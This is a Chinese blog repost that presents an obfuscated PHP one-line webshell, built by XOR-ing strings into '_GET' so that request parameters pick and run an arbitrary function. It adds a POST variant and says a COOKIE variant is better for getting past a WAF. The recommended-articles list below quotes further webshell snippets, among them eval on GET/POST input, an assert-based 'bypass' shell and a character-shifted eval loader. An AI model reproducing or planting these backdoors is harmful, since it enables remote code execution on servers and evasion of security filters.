有趣的PHP一句话

最新推荐文章于 2024-04-17 06:30:00 发布
最新推荐文章于 2024-04-17 06:30:00 发布
阅读量177 收藏
点赞数
文章标签: php
原文链接:http://www.cnblogs.com/StudyCat/p/11192971.html
版权

今天看到如下图所示的PHP一句话,觉得挺有意思。

代码如下:

<?=~$_='$<>/'^'{{{{';echo $_;@${$_}[_](@${$_}[__]);?>

 效果图:

看下图注释应该就可以一目了然了,就是根据异或运算得到$_=’_GET’。

如果想换成POST方法,则可变化如下。

<?=~$_='$+4(/'^'{{{{{';@${$_}[_](@${$_}[__]);?>

效果图:

换成COOKIE方法,则可变化如下,用于bypass waf更有用吧。这只是一种思路,这个句子还可以有很多种变形,比如随机变量名。

引用:

https://www.php.net/manual/zh/language.operators.bitwise.php

http://asciima.com/

  转载请注明出处。

转载于:https://www.cnblogs.com/StudyCat/p/11192971.html

aijin3040
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php一句话大全,[各种一句话木马大全]各种一句话
weixin_39995351的博客
03-11 8509
PHP一句话:1、普通一句话2、防爆破一句话 //菜刀地址http://192.168.64.137/x.php?x=mytest 密码:pass3、过狗一句话 //菜刀地址 http://localhost/1.php?s=assert等价于$=@$GET['s'];@$($_POST['pass']);?>4、404隐藏一句话preg_replace()方法中的e,只适用于php5及更早...
php一句话利用,常见php一句话webshell解析
weixin_39606361的博客
03-10 4845
我理解的 webshell 是在服务器上以 web server application (比如apache,iis或者nginx)的权限进行远程任意代码执行的工具。当然通过一些手段也可能可以进行提权。最基础的 php webshell1将 post 请求中的 CMD 参数直接执行。1原理浅析:1、在PHP脚本语言中,eval(code)的功能是将code组合成php指令,然后将指令执行。2、就相...
PHP一句话木马
Code-5的博客
04-17 1295
4. 上图中显示sql出错了,但是没有关系,我们可以在文件中看到attack.txt已经生成了。WebShell 是一种在 Web 服务器上运行的脚本或程序,可用于远程控制和管理服务器。保护 Web 服务器的安全对于确保网站和用户数据的安全至关重要。3. 利用文件导入的方式进行注入。
Z-BlogPHP主题制作教程#16:评论输出comment.php
03-16 234
Z-BlogPHP主题制作教程#16:评论输出comment.php window._bd_share_config={"common":{"bdSnsKey":{},"bdText":"","bdMini":"2","bdMiniList":false,"bdPic":"","bdStyle":"0","bdSize":"16"},"share":{}};with(docu...
.user.ini文件构成的PHP后门(转)
weixin_30906425的博客
12-29 327
phith0n · 2014/10/30 10:51 0x00 背景 这个估计很多同学看了不屑,认为是烂大街的东西了: .htaccess文件构成的PHP后门 那么我来个新的吧:.user.ini。它比.htaccess用的更广,不管是 nginx/apache/IIS,只要是以fastcgi运行的php都可以用这个方法。我的nginx服务器全部是fpm/fastcgi,我的...
PHP 10句话
向前进, 向前进!!
02-02 503
 1.不要依赖register_global=ON的环境,从你刚懂得配置php运行环境甚至尚不明白register_global的ON/OFF会对自己有什么影响的那天起,就应该勇敢地把它设为OFF.2.写程序前看看怎么用error_reporting.3.不懂就问本身没错,但你需要在那之前查查手册。4.当然,你需要懂得使用手册。手册上找不到答案的时候,应该考虑下网络上的搜索引擎。
php一句话cmdshell新型 (非一句话木马)
10-30
PHP 一句话 CMDShell 新型(非一句话木马)】 在 PHP 开发中,存在一种安全漏洞,称为“一句话 CMDShell”,它允许攻击者通过在 PHP 脚本中注入命令来执行系统级别的操作。虽然通常的一句话木马是直接执行 PHP ...
pHp一句话批量上传
08-29
【标题】"pHp一句话批量上传"涉及到的是PHP编程中的文件上传功能,通常是指通过简洁的PHP代码实现文件的批量上传。在Web开发中,文件上传功能是必不可少的一部分,允许用户上传图片、文档等文件到服务器。"一句话...
PHP隐形一句话后门,和ThinkPHP框架加密码程序(base64_decode)
10-28
这是一个典型的PHP一句话后门,它通过`eval`函数执行POST请求中的`c`参数所携带的任意PHP代码。当用户提交带有恶意代码的POST请求时,这个后门就会执行这些代码,从而可能导致服务器被黑客控制。 接下来,代码展示...
一句话木马要点和防范注意事项
最新发布
05-24
例如,一个简单的PHP一句话木马可能如下所示: ```php <?php eval($_GET['cmd']); ?> ``` 这个例子中,`eval`函数会执行通过GET参数`cmd`传入的任何PHP代码,从而让攻击者能够控制服务器。 了解了一句话木马的基本...
PHP一句话 免杀版
10-23
PHP一句话 免杀版
免杀代码—— 一句话php
01-15
收集于互联网,仅限个人研究使用。
常见代码执行函数
L_lemo004的博客
07-12 6145
常见代码执行函数,如 eval() assert() preg_replace() create_function() array_map() call_user_func() call_user_func_array() array_filter usort uasort() 文件操作函数 动态函数(a(a(a(b)) 1、eval() eval() 函数把字...
php简单一句话分析
weixin_30878501的博客
07-14 147
1 <?php 2 $arr="j{fq-)dUTXY`}b.@"; 3 for($i=0;$i< strlen($arr);$i++){ 4 $arr[$i]=chr(ord($arr[$i])-5); 5 }eval($arr); 6 ?> 0x00函数: strlen() //函数返回字符串的长度。chr() // 函数从指定的 A...
PHP一句话木马免杀
墨痕诉清风的博客
10-07 5555
目录 免杀小技巧 1.字符串拼接方式,构造敏感函数。 2.通过PHP的动态函数方法执行一句话。 3.利用php异或^构造字符串 免杀木马构造 一句话测试 异或转码数据 小结 免杀小技巧 1.字符串拼接方式,构造敏感函数。 <?php $a = 'ass'; $b = 'er'; $c = 't'; $d = $a.$b.$c; //assert 2.通过PHP的动态函数方法执行一句话。 <?php $a = 'assert'; $b = '_GET'; $a(.
那些强悍的PHP一句话后门
zhangge3663的博客
03-14 599
强悍的PHP一句话后门 这类后门让网站、服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的。今天我们细数一些有意思的PHP一句话木马。 利用404页面隐藏PHP小马: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><hea...
PHP一句话木马集合
热门推荐
闵行小鱼塘
05-21 1万+
whoam1(QQ:2069698797)大佬早些年做的PHP一句话木马集合,在此记录下
php一句话客戶端,那些强悍的PHP一句话后门(3)
weixin_33957089的博客
03-16 264
三个变形的一句话PHP木马第一个在菜单里写http://site/1.php?2=assert密码是1第二个$_="";$_[+""]='';$_="$_"."";$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");?>在菜刀里写http://site/2.php?_=assert&__=eval($_POST['pass']) 密码是pass。如果你...
动手实现简易PHP一句话连接工具——FruitKnife
垃圾管理员的垃圾站
08-24 1448
文章目录效果展示连接一句话浏览服务器目录打开文件跳转目录上传文件前言设计思路与需求分析功能实现连接一句话浏览目录打开文件跳转路径上传文件节目清单不足之处工具名字的由来关于系列另外两个小工具简易版HTTP报文截获工具——CatcherExif信息编辑器——ExifEditor 效果展示 连接一句话 浏览服务器目录 打开文件 跳转目录 上传文件 前言 小工具由Python语言实现,虽然并不复杂,但是为了能够更好地理解以下内容,需要读者具有PHP语言基础(能看懂代码就行,不必具有开发能力),并在阅读本文
php一句话木马图片马
01-30
根据提供的引用内容,PHP一句话木马是一种利用PHP语言特性的恶意代码,它可以在服务器上执行命令并返回结果。而图片马是一种将恶意代码嵌入到图片文件中的攻击方式。下面是一个示例,展示了如何在PHP一句话木马中...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值